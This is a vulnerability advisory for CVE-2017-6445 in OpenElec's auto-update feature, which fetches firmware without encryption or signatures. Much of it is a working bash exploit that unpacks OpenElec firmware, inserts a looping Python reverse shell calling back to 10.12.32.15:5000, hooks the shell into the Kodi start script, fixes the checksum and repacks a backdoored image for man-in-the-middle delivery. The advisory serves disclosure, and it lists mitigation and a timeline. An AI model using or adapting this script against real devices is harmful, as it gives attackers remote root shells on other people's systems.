OpenElec 6.0.3 / 7.0.1 Code Execution

`During my research about update mechanisms of open-source software I  
discovered vulnerabilities in OpenElec.  
  
== [ OVERVIEW ] ==  
  
System affected: OpenElec  
CVE: CVE-2017-6445  
Vulnerable component: auto-update feature  
Software-Version: 6.0.3, 7.0.1  
User-Interaction: Reboot required  
Impact: Remote Code Execution with root permission  
  
== [ PRODUCT DESCRIPTION ] ==  
  
According to its website "Open Embedded Linux Entertainment Center  
(OpenELEC) is a small Linux based Just Enough Operating System (JeOS)  
built from scratch as a platform to turn your computer into a Kodi media  
center."  
  
== [ VULNERABILITY ] ==  
  
Automatic updates are disabled by default. After enabling it, OpenElec  
connects to http://update.openelec.tv/updates.php to find out if there  
is an update for a newer version. If there is a newer version, openelec  
will download it from http://releases.openelec.tv/<version>.tar(or any  
other url returned by update.openelec.tv).  
  
The auto-update feature of OpenElec does neither use encrypted  
connections nor does it use signed updates. A Man-In-The-Middle could  
manipulate the update-packages to gain root-access remotely.  
In order to run the downloaded firmware, the OpenElec-system has to be  
rebooted. So at this point user-interaction is required.  
  
== [ EXPLOIT ] ==  
  
The following code downloads an openelec-firmware, extracts it, places a  
reverse-shell into the kodi-startscript and finally generates a  
backdoored firmware:  
  
#!/bin/bash  
OPENELEC="OpenELEC-RPi2.arm-7.0.1"  
DOWNLOADURL="http://releases.openelec.tv/"  
TMP="/tmp"  
  
cd $TMP  
test -e ${OPENELEC}.tar || wget $DOWNLOADURL/${OPENELEC}.tar  
test -d $OPENELEC || tar xvf ${OPENELEC}.tar  
test -d $TMP/unpacked || mkdir $TMP/unpacked  
  
cd $TMP/unpacked  
  
test -d $TMP/unpacked/squashfs-root || unsquashfs  
$TMP/$OPENELEC/target/SYSTEM  
  
cat > $TMP/unpacked/squashfs-root/usr/bin/revshell.sh << EOF  
  
#!/bin/bash  
while true  
do  
python -c 'import  
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.12.32.15",5000));os.dup2(s.fileno(),0);  
os.dup2(s.fileno(),1);  
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /dev/null 2>&1  
done  
EOF  
  
chmod 777 $TMP/unpacked/squashfs-root/usr/bin/revshell.sh  
  
awk '/trap cleanup TERM/ { print; print "/usr/bin/revshell.sh &"; next  
}1' $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh >  
$TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh  
  
mv $TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh  
  
$TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh  
  
chmod 777 $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh  
mksquashfs squashfs-root/ SYS -noappend -comp gzip  
mv SYS $TMP/$OPENELEC/target/SYSTEM  
cd $TMP/$OPENELEC  
md5sum target/SYSTEM > target/SYSTEM.md5  
cd $TMP  
tar cvf $OPENELEC.evil.tar $OPENELEC  
  
test -d $TMP/unpacked && rm -fr $TMP/unpacked  
test -d $OPENELEC && rm -rf $OPENELEC  
  
== [ MITIGATION ] ==  
  
Ensure that auto-update is disabled.  
  
== [ Timeline ] ==  
  
* This bug was reported on December 03 2016.  
* Published as Zero-Day after no reply from OpenElec on March 04 2017  
  
== [ CREDITS ] ==  
  
CVE-2017-6445 was discovered by Wolfgang Hotwagner  
(https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle)  
  
`